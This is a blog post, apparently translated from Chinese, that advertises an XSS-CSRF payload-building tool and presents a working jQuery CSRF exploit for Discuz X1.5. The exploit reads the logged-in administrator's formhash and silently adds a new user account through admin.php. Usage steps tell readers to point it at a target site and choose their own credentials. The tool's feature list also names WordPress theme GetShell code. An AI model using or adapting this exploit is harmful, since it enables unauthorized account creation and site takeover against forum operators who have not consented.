Construct XSS-CSRF code + Discuz Add User EXP

Construct XSS-CSRF code + Discuz Add User EXP

Recently I have been studying various types of XSS. Naturally, it is essential to construct various types of CSRF. This is actually very simple. A local environment administrator will log on to the system and capture the specified operation. Then JS or FLASH will be used for XXOO.

The conversion function is very simple, but it is very practical. In the popular era of XSS, this function will also become common. In addition, it also saves more time for post parameters, manual construction may not only take time and omit one of the parameters, but may cause CSRF failure. I asked, Are you afraid?

Image:

Function:
[+] EncodeDecode Post submit code (Flash/jQuery/Flash/Python/Perl/PHP) 20141208
[+] EncodeDecode Python Post parameter and conventional Post parameter conversion (easy to write EXP) 20141208
[+] Switching between EncodeDecode Flash Post parameters and conventional Post parameters (for XSS-CSRF) 20141208
[+] EncodeDecode jQuery Post parameter interchange with conventional Post parameters (for XSS-CSRF) 20141206
[+] EncodeDecode adds the WordPress background theme GetShell code + right-click menu beautification 20141203
[+] Right-click ExpDebug to copy all Web Information Banner/IP/address location information 20101202
[+] EncodeDecode right-click the selected URL and choose Firefox \ Chrome \ IE to open 20141128.
[+] DataOutput regular data truncation (results support extraction of 8 parameters at the same time for higher flexibility) 20141128

 

Discuz X1.5 CSRF Add User EXP

<script src="http://www.bkjia.com/jquery-1.4.1.min.js" type="text/javascript"></script>    <script type="text/javascript">         $(function () {             $.post("http://192.168.85.182/dz15/", function (data) {                var getFormHash = data.split('action=logout&amp;formhash=')[1].split('">')[0];                $.post("http://192.168.85.182/dz15/admin.php?action=members&operation=add", { formhash:  getFormHash,scrolltop:  "",anchor:  "",newusername:  "2cto",newpassword:  "2cto",newemail:  "2cto@xx.com",newgroupid:  "10",emailnotify:  "0",addsubmit:  "%CC%E1%BD%BB"});             });          }); </script>

Usage:

1. Replace the above www.bkjia.com address jquery-1.4.1.min.js with your own address

2. Replace 192.168.85.182/dz15/with the address of the target site to be tested.

3 change the 2cto2cto2cto@xx.com to the account password mailbox you need to add

Ps: If you still do not know anything, join the VIP member of the Red/Black alliance and contact our technical customer service. We will answer any technical questions immediately.